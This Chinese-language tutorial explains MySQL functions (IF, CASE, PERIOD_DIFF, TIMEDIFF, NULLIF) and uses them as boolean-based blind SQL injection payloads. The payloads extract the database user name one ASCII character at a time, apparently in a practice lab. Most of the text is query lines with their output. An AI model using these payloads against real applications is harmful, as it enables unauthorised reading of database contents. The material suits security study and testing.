0x00 基础数据
mysql> select user();+---------------+| user() |+---------------+| root@localhost |+---------------+1 row in set
mysql> select * from test_table;+----+-------+| id | name |+----+-------+| 1 | bbb || 2 | aaa |+----+-------+2 rows in set
0x01 IF表达式
解释: SELECT IF(表达式, 表达式成立时返回, 表达式不成立时返回)
0x01.1 IF表达式例子
mysql> select IF(1=1,1,0);+-------------+| IF(1=1,1,0) |+-------------+| 1 |+-------------+1 row in set (0.00 sec)
mysql> select IF(1=2,1,0);+-------------+| IF(1=2,1,0) |+-------------+| 0 |+-------------+1 row in set (0.00 sec)
0x02 CASE表达式
解释1:select case 表达式when 判断条件 then 返回结果else 条件不成立时返回 end
解释2:case 后面紧跟要被作为判断的字段when 后面跟判断条件then 后面跟结果else 相当于 defaultend 是语句结束语
0x02.1 CASE表达式例子
mysql> select case 1-> when 1 then '成功'-> when 2 then '失败'-> else '其他' end;----------------+| 成功 |+---------------+1 row in set, 3 warnings (0.00 sec)
mysql> select case 2-> when 1 then '成功'-> when 2 then '失败'-> else '其他' end;----------------+| 失败 |+---------------+1 row in set, 3 warnings (0.00 sec)
mysql> select case 3-> when 1 then '成功'-> when 2 then '失败'-> else '其他' end;----------------+| 其他 |+---------------+1 row in set, 3 warnings (0.00 sec)
mysql> SELECT-> CASE-> WHEN 1 = 1-> THEN '真'-> ELSE '假'-> END;+----------------------------------+| 真 |+----------------------------------+1 row in setmysql> SELECT-> CASE-> WHEN 1 = 2-> THEN '真'-> ELSE '假'-> END;+----------------------------------+| 假 |+----------------------------------+1 row in set
0x03 PERIOD_DIFF() 函数
PERIOD_DIFF(period1, period2) 返回两个时段之间的月份差值
0x03.1 例子
# user() 第一位数据转asciimysql> select ascii(substring(user(),1,1));+------------------------+| ascii(substring(user(),1,1)) |+------------------------+| 114 |+------------------------+1 row in set
# user() 第二位数据转asciimysql> select ascii(substring(user(),2,1));+------------------------+| ascii(substring(user(),2,1)) |+------------------------+| 111 |+------------------------+1 row in set
# 表示注入失败的时候# 表示两个值相差1位# ascii(substring(user(),1,1)) = 114# 不为0就是表示True,那么页面就不会产生变化mysql> select PERIOD_DIFF(ascii(substring(user(),1,1)), 113);+----------------------------------------+| PERIOD_DIFF(ascii(substring(user(),1,1)), 113) |+----------------------------------------+| 1 |+----------------------------------------+1 row in set# 匹配失败的时候页面的数据会返回正常,不产生变化mysql> SELECT * from test_table where id=1 and PERIOD_DIFF(ascii(substring(user(),1,1)), 113);+----+-------+| id | name |+----+-------+| 1 | bbb |+----+-------+1 row in set
# 表示注入成功的时候# 表示两个值相等# ascii(substring(user(),1,1)) = 114# 为0就是表示Falsemysql> select PERIOD_DIFF(ascii(substring(user(),1,1)), 114);+----------------------------------------+| PERIOD_DIFF(ascii(substring(user(),1,1)), 114) |+----------------------------------------+| 0 |+----------------------------------------+1 row in set# 匹配成功的时候,因为函数返回了0 ,0表示False,所以就不查询数据出来了mysql> SELECT * from test_table where id=1 and PERIOD_DIFF(ascii(substring(user(),1,1)), 114);Empty set
0x04 TIMEDIFF() 函数
TIMEDIFF(time1, time2) 计算时间差值
0x04.1 例子
# user() 第一位数据转asciimysql> select ascii(substring(user(),1,1));+------------------------+| ascii(substring(user(),1,1)) |+------------------------+| 114 |+------------------------+1 row in set
# user() 第二位数据转asciimysql> select ascii(substring(user(),2,1));+------------------------+| ascii(substring(user(),2,1)) |+------------------------+| 111 |+------------------------+1 row in set
# 表示注入失败的时候# 表示两个值相差1位# ascii(substring(user(),1,1)) = 114# 不为0就是表示True,那么页面就不会产生变化mysql> SELECT TIMEDIFF(ascii(substring(user(),1,1)), 113);+-------------------------------------+| TIMEDIFF(ascii(substring(user(),1,1)), 113) |+-------------------------------------+| 00:00:01 |+-------------------------------------+1 row in set# 匹配失败的时候页面的数据会返回正常,不产生变化mysql> SELECT * from test_table where id=1 and TIMEDIFF(ascii(substring(user(),1,1)), 113);+----+-------+| id | name |+----+-------+| 1 | bbb |+----+-------+1 row in set
# 表示注入成功的时候# 表示两个值相等# ascii(substring(user(),1,1)) = 114# 为0就是表示Falsemysql> SELECT TIMEDIFF(ascii(substring(user(),1,1)), 114);+-------------------------------------+| TIMEDIFF(ascii(substring(user(),1,1)), 114) |+-------------------------------------+| 00:00:00 |+-------------------------------------+1 row in set# 匹配成功的时候,因为函数返回了0 0表示False,所以就不查询数据出来了mysql> SELECT * from test_table where id=1 and TIMEDIFF(ascii(substring(user(),1,1)), 114);Empty set
0x05 NULLIF(expr1, expr2)
NULLIF(expr1, expr2) 比较两个字符串,如果字符串 expr1 与 expr2 相等 返回 NULL,否则返回 expr1
0x05.1 例子
# user() 第一位数据转asciimysql> select ascii(substring(user(),1,1));+------------------------+| ascii(substring(user(),1,1)) |+------------------------+| 114 |+------------------------+1 row in set
# user() 第二位数据转asciimysql> select ascii(substring(user(),2,1));+------------------------+| ascii(substring(user(),2,1)) |+------------------------+| 111 |+------------------------+1 row in set
# 表示注入失败的时候# 匹配不相等的话返回的是 NULLIF 第一个参数的结果值mysql> select * from users where id =1 and NULLIF(ascii(substring(user(),1,1)),113);+----+----------+----------+| id | username | password |+----+----------+----------+| 1 | Dumb | Dumb |+----+----------+----------+1 row in set (0.00 sec)
# 表示注入成功的时候# 匹配相等会返回 NULL 所以sql不会返回数据mysql> SELECT * from test_table where id=1 and NULLIF(ascii(substring(user(),1,1)),114);Empty set
# 获取到的数据转成十进制mysql> select concat(char('114'),char('111'));+---------------------------+| concat(char('114'),char('111')) |+---------------------------+| ro |+---------------------------+1 row in set
若有收获,就点个赞吧
0 人点赞
